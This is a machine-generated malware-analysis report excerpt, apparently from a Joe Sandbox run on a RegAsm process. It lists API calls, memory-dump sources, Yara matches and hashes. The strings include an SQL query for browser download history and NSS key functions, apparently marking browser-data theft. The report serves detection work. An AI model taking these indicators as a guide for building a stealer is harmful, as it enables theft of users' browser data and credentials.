                                                                                                        • Opcode Fuzzy Hash: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
                                                                                                        • Instruction Fuzzy Hash: 0141B3B2A00118ABCF10DFA5CD42ADE3BB8AB84714F15413BFD40F7280EB78D9458B99
                                                                                                        APIs
                                                                                                        • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C0CF480
                                                                                                          • Part of subcall function 6C09F100: LoadLibraryW.KERNEL32(shell32,?,6C10D020), ref: 6C09F122
                                                                                                          • Part of subcall function 6C09F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C09F132
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6C0CF555
                                                                                                          • Part of subcall function 6C0A14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C0A1248,6C0A1248,?), ref: 6C0A14C9
                                                                                                          • Part of subcall function 6C0A14B0: memcpy.VCRUNTIME140(?,6C0A1248,00000000,?,6C0A1248,?), ref: 6C0A14EF
                                                                                                          • Part of subcall function 6C09EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C09EEE3
                                                                                                        • CreateFileW.KERNEL32 ref: 6C0CF4FD
                                                                                                        • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C0CF523
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                        • String ID: \oleacc.dll
                                                                                                        • API String ID: 2595878907-3839883404
                                                                                                        • Opcode ID: 047d7c6297be38dcf8ecdddb2ddaf5234b6660bcd85f737c0e70829f293f27e9
                                                                                                        • Instruction ID: 26491c69b14cdd3f3ceb1f16e28760b6ed8df335265129c22d0514bf9053dee7
                                                                                                        • Opcode Fuzzy Hash: 047d7c6297be38dcf8ecdddb2ddaf5234b6660bcd85f737c0e70829f293f27e9
                                                                                                        • Instruction Fuzzy Hash: 7E419D707087109FE720DF68C984B9EB7F8AF84318F504A1CF69483650EB74EA498B93
                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,759183C0,00000000,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C019
                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0041C58F,?,00416F27), ref: 0041C049
                                                                                                        • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C075
                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C083
                                                                                                          • Part of subcall function 0041B991: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,039E2548), ref: 0041B9C5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                                        • String ID: 'oA
                                                                                                        APIs
                                                                                                        • PR_MillisecondsToInterval.NSS3(?), ref: 6C226E36
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C226E57
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • PR_MillisecondsToInterval.NSS3(?), ref: 6C226E7D
                                                                                                        • PR_MillisecondsToInterval.NSS3(?), ref: 6C226EAA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: IntervalMilliseconds$ErrorValue
                                                                                                        • String ID: n,l
                                                                                                        APIs
                                                                                                        • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C242AE9,00000000,0000065C), ref: 6C25A91D
                                                                                                          • Part of subcall function 6C1FADC0: TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE10
                                                                                                          • Part of subcall function 6C1FADC0: EnterCriticalSection.KERNEL32(?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE24
                                                                                                          • Part of subcall function 6C1FADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C1DD079,00000000,00000001), ref: 6C1FAE5A
                                                                                                          • Part of subcall function 6C1FADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE6F
                                                                                                          • Part of subcall function 6C1FADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE7F
                                                                                                          • Part of subcall function 6C1FADC0: TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEB1
                                                                                                          • Part of subcall function 6C1FADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEC9
                                                                                                        • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C242AE9,00000000,0000065C), ref: 6C25A934
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000000,?,?,6C242AE9,00000000,0000065C), ref: 6C25A949
                                                                                                        • free.MOZGLUE(?,00000000,0000065C), ref: 6C25A952
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                        • String ID: *$l
                                                                                                        APIs
                                                                                                        • SetLastError.KERNEL32(00000000), ref: 6C0F7526
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0F7566
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0F7597
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Init_thread_footer$ErrorLast
                                                                                                        • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                        APIs
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C157915,?,?), ref: 6C28A86D
                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C157915,?,?), ref: 6C28A8A6
                                                                                                        Strings
                                                                                                        • database corruption, xrefs: 6C28A89B
                                                                                                        • %s at line %d of [%.10s], xrefs: 6C28A8A0
                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C28A891
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _byteswap_ulongsqlite3_log
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                        APIs
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F2C7
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
                                                                                                          • Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F2E6
                                                                                                        • _memmove.LIBCMT ref: 0040F320
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        APIs
                                                                                                        • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C1A0BDE), ref: 6C1A0DCB
                                                                                                        • strrchr.VCRUNTIME140(00000000,0000005C,?,6C1A0BDE), ref: 6C1A0DEA
                                                                                                        • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C1A0BDE), ref: 6C1A0DFC
                                                                                                        • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C1A0BDE), ref: 6C1A0E32
                                                                                                        Strings
                                                                                                        • %s incr => %d (find lib), xrefs: 6C1A0E2D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: strrchr$Print_stricmp
                                                                                                        • String ID: %s incr => %d (find lib)
                                                                                                        APIs
                                                                                                        • PK11_FreeSymKey.NSS3(?,@]$l,00000000,?,?,6C236AC6,?), ref: 6C25AC2D
                                                                                                          • Part of subcall function 6C1FADC0: TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE10
                                                                                                          • Part of subcall function 6C1FADC0: EnterCriticalSection.KERNEL32(?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE24
                                                                                                          • Part of subcall function 6C1FADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C1DD079,00000000,00000001), ref: 6C1FAE5A
                                                                                                          • Part of subcall function 6C1FADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE6F
                                                                                                          • Part of subcall function 6C1FADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE7F
                                                                                                          • Part of subcall function 6C1FADC0: TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEB1
                                                                                                          • Part of subcall function 6C1FADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEC9
                                                                                                        • PK11_FreeSymKey.NSS3(?,@]$l,00000000,?,?,6C236AC6,?), ref: 6C25AC44
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]$l,00000000,?,?,6C236AC6,?), ref: 6C25AC59
                                                                                                        • free.MOZGLUE(8CB6FF01,6C236AC6,?,?,?,?,?,?,?,?,?,?,6C245D40,00000000,?,6C24AAD4), ref: 6C25AC62
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                        • String ID: @]$l
                                                                                                        • API String ID: 1595327144-1809380887
                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C0FC0E9), ref: 6C0FC418
                                                                                                        • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C0FC437
                                                                                                        • FreeLibrary.KERNEL32(?,6C0FC0E9), ref: 6C0FC44C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                        • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                        • API String ID: 145871493-2623246514
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • lstrlenA.KERNEL32(?), ref: 004094AB
                                                                                                        • lstrlenA.KERNEL32(?), ref: 004094C6
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                        • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                        • API String ID: 2500673778-2241552939
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1AEDFD
                                                                                                        • calloc.MOZGLUE(00000001,00000000), ref: 6C1AEE64
                                                                                                        • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C1AEECC
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C1AEEEB
                                                                                                        • free.MOZGLUE(?), ref: 6C1AEEF6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorValuecallocfreememcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3833505462-0
                                                                                                        APIs
                                                                                                        • PORT_ArenaMark_Util.NSS3(00000000,?,6C1B3FFF,00000000,?,?,?,?,?,6C1B1A1C,00000000,00000000), ref: 6C1BADA7
                                                                                                          • Part of subcall function 6C2114C0: TlsGetValue.KERNEL32 ref: 6C2114E0
                                                                                                          • Part of subcall function 6C2114C0: EnterCriticalSection.KERNEL32 ref: 6C2114F5
                                                                                                          • Part of subcall function 6C2114C0: PR_Unlock.NSS3 ref: 6C21150D
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C1B3FFF,00000000,?,?,?,?,?,6C1B1A1C,00000000,00000000), ref: 6C1BADB4
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,?,6C1B3FFF,?,?,?,?,6C1B3FFF,00000000,?,?,?,?,?,6C1B1A1C,00000000), ref: 6C1BADD5
                                                                                                          • Part of subcall function 6C20FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C208D2D,?,00000000,?), ref: 6C20FB85
                                                                                                          • Part of subcall function 6C20FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C20FBB1
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C2D94B0,?,?,?,?,?,?,?,?,6C1B3FFF,00000000,?), ref: 6C1BADEC
                                                                                                          • Part of subcall function 6C20B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2E18D0,?), ref: 6C20B095
                                                                                                        • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C1B3FFF), ref: 6C1BAE3C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 2372449006-0
                                                                                                        APIs
                                                                                                        • PK11_GetInternalKeySlot.NSS3(?,?,?,6C1F2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C1C4F1C), ref: 6C1D8EA2
                                                                                                          • Part of subcall function 6C1FF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C1FF854
                                                                                                          • Part of subcall function 6C1FF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C1FF868
                                                                                                          • Part of subcall function 6C1FF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C1FF882
                                                                                                          • Part of subcall function 6C1FF820: free.MOZGLUE(04C483FF,?,?), ref: 6C1FF889
                                                                                                          • Part of subcall function 6C1FF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C1FF8A4
                                                                                                          • Part of subcall function 6C1FF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C1FF8AB
                                                                                                          • Part of subcall function 6C1FF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C1FF8C9
                                                                                                          • Part of subcall function 6C1FF820: free.MOZGLUE(280F10EC,?,?), ref: 6C1FF8D0
                                                                                                        • PK11_IsLoggedIn.NSS3(?,?,?,6C1F2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C1C4F1C), ref: 6C1D8EC3
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,6C1F2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C1C4F1C), ref: 6C1D8EDC
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C1F2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C1D8EF1
                                                                                                        • PR_Unlock.NSS3 ref: 6C1D8F20
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 1978757487-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _freemalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 3576935931-0
                                                                                                        • Opcode ID: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
                                                                                                        • Instruction ID: b76dc663818b464284d97c71afdab2e33c7188303a79513cbdb4af8dfc28d3f2
                                                                                                        • Opcode Fuzzy Hash: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
                                                                                                        • Instruction Fuzzy Hash: CB112732B40A31EBCF216F79BC0575A37A5AF803B5F60403FF8498A250DE7C8980969C
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208821
                                                                                                        • TlsGetValue.KERNEL32(?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C20883D
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208856
                                                                                                        • PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C208887
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,6C21085A,00000000,?,6C1B8369,?), ref: 6C208899
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07AD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07CD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07D6
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C13204A), ref: 6C1A07E4
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,6C13204A), ref: 6C1A0864
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C1A0880
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,6C13204A), ref: 6C1A08CB
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08D7
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 2759447159-0
                                                                                                        • Opcode ID: 54984e51604e1ceb1add44a749351ec1a294bb70f08fa10d35f212c1f0a8e8ad
                                                                                                        • Instruction ID: ef7eb5862ab88bd8412a4b5d63e041cc91067021aac32d4a9f6535e5f19952b1
                                                                                                        • Opcode Fuzzy Hash: 54984e51604e1ceb1add44a749351ec1a294bb70f08fa10d35f212c1f0a8e8ad
                                                                                                        • Instruction Fuzzy Hash: 21214CB5A0460E8FDB00AF78C5886AABBB4FF05309F10466BDC9496645E730D595CB92
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,6C1C80DD), ref: 6C1D28BA
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C1C80DD), ref: 6C1D28D3
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C1C80DD), ref: 6C1D28E8
                                                                                                        • DeleteCriticalSection.KERNEL32(?,?,?,?,?,6C1C80DD), ref: 6C1D290E
                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,6C1C80DD), ref: 6C1D291A
                                                                                                          • Part of subcall function 6C1C9270: DeleteCriticalSection.KERNEL32(?,?,6C1D5089,?,6C1D3B70,?,?,?,?,?,6C1D5089,6C1CF39B,00000000), ref: 6C1C927F
